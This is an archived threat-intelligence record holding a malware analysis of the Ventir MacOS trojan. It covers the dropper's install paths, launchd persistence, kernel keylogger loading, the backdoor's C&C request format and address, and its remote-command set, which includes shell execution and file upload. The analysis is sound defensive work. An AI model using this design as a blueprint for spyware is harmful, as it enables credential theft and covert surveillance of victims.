{
	"id": "00e69c8f-d273-4588-a0bf-a9bbf87da7c8",
	"created_at": "2026-04-06T00:21:41.509428Z",
	"updated_at": "2026-04-10T03:20:22.333052Z",
	"deleted_at": null,
	"sha1_hash": "041b06c36f8ce4ec2656b8d3bb399fe6a88d9575",
	"title": "The Ventir Trojan: assemble your MacOS spy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 231882,
	"plain_text": "The Ventir Trojan: assemble your MacOS spy\r\nBy Mikhail Kuzin\r\nPublished: 2014-10-16 · Archived: 2026-04-05 18:34:37 UTC\r\nWe got an interesting file (MD5 9283c61f8cce4258c8111aaf098d21ee) for analysis a short while ago. It turned out\r\nto be a sample of modular malware for MacOS X. Even after preliminary analysis it was clear that the file was not\r\ndesigned for any good purpose: an ordinary 64-bit mach-o executable contained several more mach-o files in its\r\ndata section; it set one of them to autorun, which is typical of Trojan-Droppers.\r\nFurther investigation showed that a backdoor, a keylogger and a Trojan-Spy were hidden inside the sample. It is\r\nparticularly noteworthy that the keylogger uses an open-source kernel extension. The extension’s code is publicly\r\navailable, for example, on GitHub!\r\nDepending on their purpose, these files are detected by Kaspersky Lab antivirus solutions as Trojan-Dropper.OSX.Ventir.a, Backdoor.OSX.Ventir.a, Trojan-Spy.OSX.Ventir.a and not-a-virus:Monitor.OSX.LogKext.c.\r\nSource file (Trojan-Dropper.OSX.Ventir.a)\r\nAs soon as it is launched, the dropper checks whether it has root access by calling the geteuid () function. The\r\nresult of the check determines where the Trojan’s files will be installed:\r\nIf it has root access, the files will be installed in /Library/.local and /Library/LaunchDaemons;\r\nIf it does not have root access, the files will be installed in ~/Library/.local and ~/Library/LaunchAgents\r\n(“~” stands for the path to the current user’s home directory).\r\nAll files of the Trojan to be downloaded to the victim machine are initially located in the “__data” section of the\r\ndropper file.\r\nLocation of the Trojan’s files inside the dropper\r\nAs a result, the following files will be installed on the infected system:\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 1 of 5\n\n1. 1 Library/.local/updated – re-launches files update and EventMonitor in the event of unexpected\r\ntermination.\r\n2. 2 Library/.local/reweb – used to re-launch the file updated.\r\n3. 3 Library/.local/update – the backdoor module.\r\n4. 4 Library/.local/libweb.db – the malicious program’s database file. Initially contains the Trojan’s global\r\nsettings, such as the C\u0026C address.\r\n5. 5 Library/LaunchAgents (or LaunchDaemons)/com.updated.launchagent.plist – the properties file used to\r\nset the file Library/.local/updated to autorun using the launchd daemon.\r\n6. 6 Depending on whether root access is available:\r\nА) if it is – /Library/.local/kext.tar. The following files are extracted from the archive:\r\nupdated.kext – the driver that intercepts user keystrokes\r\nKeymap.plist – the map which matches the codes of the keys pressed by the user to the characters\r\nassociated with these codes;\r\nEventMonitor – the agent which logs keystrokes as well as certain system events to the following\r\nfile: Library/.local/.logfile.\r\nB) if it isn’t – ~/Library/.local/EventMonitor. This is the agent that logs the current active window name\r\nand the keystrokes to the following file: Library/.local/.logfile\r\nAfter installing these files, the Trojan sets the file updated to autorun using launchctl – the standard console utility\r\n(launchctl load% s/com.updated.launchagent.plist command).\r\nNext, if root access is available, the dropper loads the logging driver into the kernel using the standard utility OSX\r\nkextload (kextload /System/Library/Extensions/updated.kext command)\r\nAfter that, Trojan-Dropper.OSX.Ventir.a launches the file reweb and removes itself from the system.\r\nUpdated and reweb files\r\nThe file updated terminates all processes with the name reweb (killall -9 reweb command). After that, it regularly\r\nchecks whether the processes EventMonitor and update are running and restarts them if necessary.\r\nThe file reweb terminates all processes with the names updated and update and then runs the file\r\nLibrary/.local/updated.\r\nUpdate (Backdoor.OSX.Ventir.a) file\r\nThe backdoor first allocates the field values from the config table of the libweb.db database to local variables for\r\nfurther use.\r\nTo receive commands from C\u0026C, the  malware uses an HTTP GET request in the following format:\r\nhttp://220.175.13.250:82/macsql.php?mode=getcmd\u0026key=1000\u0026udid=000C29174BA0, where key is some key\r\nstored in libweb.db in the config table; udid is the MAC address and 220.175.13.250:82 is the IP-address and port\r\nof the C \u0026 C server.\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 2 of 5\n\nThis request is sent regularly at short intervals in an infinite loop.\r\nThe backdoor can process the following commands from C\u0026C:\r\nreboot – restart the computer;\r\nrestart – restart the backdoor by launching reweb file;\r\nuninstall – completely remove the backdoor from the system\r\nshow config – send data from the config table to the C\u0026C server;\r\ndown exec – update the file update, download it from the C\u0026C-server;\r\ndown config – update configuration file libweb.db, download it from the C\u0026C server;\r\nupload config – send the file libweb.db to the C\u0026C server;\r\nupdate config:[parameters] – update the config table in the libweb.db database file; values of fields from\r\nthe table are sent as parameters;\r\nexecuteCMD:[ parameter] – execute the command specified in the parameter using the function\r\npopen(cmd, “r”); send the command’s output to the C \u0026 C server;\r\nexecuteSYS:[parameter] – execute the command specified in the parameter using the function\r\nsystem(cmd);\r\nexecutePATH:[parameter] – run file from the Library/.local/ directory; the file name is sent in the\r\nparameter;\r\nuploadfrompath:[parameter] – upload file with the name specified in the parameter from the Library/.local/\r\ndirectory to the C\u0026C server;\r\ndownfile:[parameters] – download file with the name specified in a parameter from the C\u0026C server and\r\nsave it to the path specified in another parameter.\r\nSome of the commands processed by the backdoor module\r\nEventMonitor (Trojan-Spy.OSX.Ventir.a) file\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 3 of 5\n\nThis file is downloaded to the system if the dropper cannot get root access. Once launched, Trojan-Spy.OSX.Ventir.a installs its own system event handler using Carbon Event Manager API functions. The new\r\nhandler intercepts all keystroke events and logs them to the file ~/Library/.local/.logfile. Modifier buttons (e.g.,\r\nshift) are logged as follows: [command], [option], [ctrl], [fn], [ESC], [tab], [backspace], etc.\r\nKeyboard event handler\r\nImmediately before processing a keystroke, the malware determines the name of the process whose window is\r\ncurrently active. To do this, it uses GetFrontProcess and CopyProcessName functions from Carbon API. The name\r\nof the process is also logged as [Application {process_name} is the frontwindow]. This enables the Trojan’s\r\nowner to determine in which application the phrase logged was entered.\r\nkext.tar (not-a-virus:Monitor.OSX.LogKext.c) file\r\nAs mentioned above, the kext.tar archive is downloaded to the infected computer if Trojan-Dropper.OSX.Ventir\r\nhas successfully got root access. The archive contains three files:\r\nupdated.kext\r\nEventMonitor\r\nKeymap.plist\r\nThe updated.kext software package is an open-source kernel extension (kext) designed to intercept keystrokes.\r\nThis extension has long been detected by Kaspersky Lab products as not-a-virus:Monitor.OSX.LogKext.c and the\r\nsource code (as it mentioned earlier) is currently available to the general public.\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 4 of 5\n\nThe file Keymap.plist is a map which matches the codes of keys pressed to their values. The file EventMonitor\r\nuses it to determine key values based on the codes provided to it by the file updated.kext.\r\nThe file EventMonitor is an agent file that receives data from the updated.kext kernel extension, processes it and\r\nrecords it in the /Library/.local/.logfile log file. Below is a fragment of the log that contains a login and password\r\nintercepted by the Trojan\r\nAs the screenshot demonstrates, as soon as a victim enters the username and password to his or her email account\r\non yandex.ru, the data is immediately logged and falls into the cybercriminals’ hands.\r\nThis threat is especially significant in view of the recent leaks of login and password databases from Yandex,\r\nMail.ru and Gmail. It is quite possible that malware from the Ventir family was used to supply data to the\r\ndatabases published by cybercriminals.\r\nIn conclusion, it should be noted that Trojan-Dropper.OSX.Ventir.a with its modular structure is similar to the\r\ninfamous Trojan.OSX.Morcut (aka OSX/Crisis), which had approximately the same number of modules with\r\nsimilar functionality. Using open-source software makes it much easier for cybercriminals to create new malware.\r\nThis means we can safely assume that the number of Trojan-Spy programs will only grow in the future.\r\nSource: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nhttps://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/"
	],
	"report_names": [
		"67267"
	],
	"threat_actors": [],
	"ts_created_at": 1775434901,
	"ts_updated_at": 1775791222,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.pdf",
		"text": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.txt",
		"img": "https://archive.orkl.eu/041b06c36f8ce4ec2656b8d3bb399fe6a88d9575.jpg"
	}
}